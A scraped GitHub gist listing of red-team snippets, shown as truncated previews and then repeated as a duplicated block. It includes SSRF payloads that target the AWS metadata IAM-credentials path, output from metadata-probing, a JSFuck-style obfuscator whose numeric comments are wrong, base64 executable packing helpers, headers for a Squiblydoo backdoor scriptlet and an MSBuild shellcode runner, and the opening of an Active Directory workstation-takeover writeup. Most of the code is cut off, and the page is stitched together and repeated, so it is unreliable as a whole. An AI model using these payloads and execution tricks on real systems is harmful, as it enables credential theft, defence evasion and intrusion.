mosesrenegade mosesrenegade

## disable_weak_ssl_and_tls_ciphers_in_windows.ps1
Write-Host 'Powershell Scripts Script to remove SSLv2, SSLv3, TLSv1.0, and TLSv1.1'
New-Item 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server' -Force | Out-Null
New-ItemProperty -path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server' -name 'Enabled' -value '0' -PropertyType 'DWord' -Force | Out-Null
New-ItemProperty -path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server' -name 'DisabledByDefault' -value 1 -PropertyType 'DWord' -Force | Out-Null
New-Item 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Client' -Force | Out-Null
New-ItemProperty -path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Client' -name 'Enabled' -value '0' -PropertyType 'DWord' -Force | Out-Null
New-ItemProperty -path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Client' -name 'DisabledByDefault' -

## convert_from_b64.ps1
$EXE_Path = 'C:\Tools\file.exe'
$Base64_Code = Get-Content('C:\Tools\file.b64') -encoding UTF8
[Byte[]]$Bytes = [convert]::FromBase64String($Base64_Code)
[System.IO.File]::WriteAllBytes($EXE_Path, $Bytes)

## convert_to_b64.ps1
$fp = 'C:\tools\file.exe'
$encf = [System.IO.File]::ReadAllBytes($fp);
[System.Convert]::ToBase64String($encf) | Out-File 'C:\Tools\file.b64'

## obfuscator.js
const fs = require('fs');

const zero = '+[]'; // 1
const one = '+!![]'; // 1
const two = '('+ one + one +')'; // 2
const three = '('+ one + one + one +')'; // 3
const four = '('+ one + one + '<<' + one +')'; // 3
const five = '('+ four + one +')'; // 4
const six = '('+ one + one + one + '<<' + one +')'; // 4
const seven = '('+ six + one +')';

## cloud_metadata.txt
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
http://[fd00:ec2::254]

## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data

## Workstation-Takeover.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                mosesrenegade
                / Workstation-Takeover.md
            
            
              Created
              August 12, 2021 11:06
                — forked from gladiatx0r/Workstation-Takeover.md
            
              
                From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
              
          
    Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
Relaying that machine authentication to LDAPS for configuring RBCD
RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

  
## Backdoor-Minimalist.sct
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<!--  License: BSD3-Clause -->
	<script language="JScript">
		<![CDATA[


## example_output.txt
$ ./try_local_metadata.sh
Trying 169.254.169.254...             found metadata
Trying 169.254.43518...               -
Trying 169.1668966...                 -
Trying 2852039166...                  found metadata
Trying 0251.0376.0251.0376...         found metadata
Trying 0251.0376.0124776...           -
Trying 251.0775248...                 -
Trying 25177524776...                 -
Trying 0xa9.0xfe.0xa9.0xfe...         found metadata

## execute_x64_shellcode.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes x64 shellcode. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
  <!-- Save This File And Execute The Above Command -->
  <!-- Author: Casey Smith, Twitter: @subTee -->
  <!-- License: BSD 3-Clause -->
  <Target Name="Hello">
    <ClassExample />
  </Target>
  <UsingTask

## map_host_drive.ps1
Param(
    [Parameter(Mandatory, Position = 0)]
    [string]$HostDrive,
    [Parameter(Mandatory, Position = 1)]
    [string]$LocalDrive
)

# Script to map a host drive inside a Windows Docker Server Container
# You need to be an admin in the container for this to work.
# Use as .\map_host_drive C: X:
	Write-Host 'Powershell Scripts Script to remove SSLv2, SSLv3, TLSv1.0, and TLSv1.1'
	New-Item 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server' -Force \| Out-Null
	New-ItemProperty -path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server' -name 'Enabled' -value '0' -PropertyType 'DWord' -Force \| Out-Null
	New-ItemProperty -path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server' -name 'DisabledByDefault' -value 1 -PropertyType 'DWord' -Force \| Out-Null
	New-Item 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Client' -Force \| Out-Null
	New-ItemProperty -path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Client' -name 'Enabled' -value '0' -PropertyType 'DWord' -Force \| Out-Null
	New-ItemProperty -path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Client' -name 'DisabledByDefault' -
	$EXE_Path = 'C:\Tools\file.exe'
	$Base64_Code = Get-Content('C:\Tools\file.b64') -encoding UTF8
	[Byte[]]$Bytes = [convert]::FromBase64String($Base64_Code)
	[System.IO.File]::WriteAllBytes($EXE_Path, $Bytes)
	$fp = 'C:\tools\file.exe'
	$encf = [System.IO.File]::ReadAllBytes($fp);
	[System.Convert]::ToBase64String($encf) \| Out-File 'C:\Tools\file.b64'
	const fs = require('fs');

	const zero = '+[]'; // 1
	const one = '+!![]'; // 1
	const two = '('+ one + one +')'; // 2
	const three = '('+ one + one + one +')'; // 3
	const four = '('+ one + one + '<<' + one +')'; // 3
	const five = '('+ four + one +')'; // 4
	const six = '('+ one + one + one + '<<' + one +')'; // 4
	const seven = '('+ six + one +')';
	## IPv6 Tests
	http://[::ffff:169.254.169.254]
	http://[0:0:0:0:0:ffff:169.254.169.254]
	http://[fd00:ec2::254]

	## AWS
	# Amazon Web Services (No Header Required)
	# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
	http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
	http://169.254.169.254/latest/user-data
	<?XML version="1.0"?>
	<scriptlet>
	<registration
	progid="PoC"
	classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<!-- License: BSD3-Clause -->
	<script language="JScript">
	<![CDATA[
	$ ./try_local_metadata.sh
	Trying 169.254.169.254... found metadata
	Trying 169.254.43518... -
	Trying 169.1668966... -
	Trying 2852039166... found metadata
	Trying 0251.0376.0251.0376... found metadata
	Trying 0251.0376.0124776... -
	Trying 251.0775248... -
	Trying 25177524776... -
	Trying 0xa9.0xfe.0xa9.0xfe... found metadata
	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- This inline task executes x64 shellcode. -->
	<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
	<!-- Save This File And Execute The Above Command -->
	<!-- Author: Casey Smith, Twitter: @subTee -->
	<!-- License: BSD 3-Clause -->
	<Target Name="Hello">
	<ClassExample />
	</Target>
	<UsingTask
	Param(
	[Parameter(Mandatory, Position = 0)]
	[string]$HostDrive,
	[Parameter(Mandatory, Position = 1)]
	[string]$LocalDrive
	)

	# Script to map a host drive inside a Windows Docker Server Container
	# You need to be an admin in the container for this to work.
	# Use as .\map_host_drive C: X: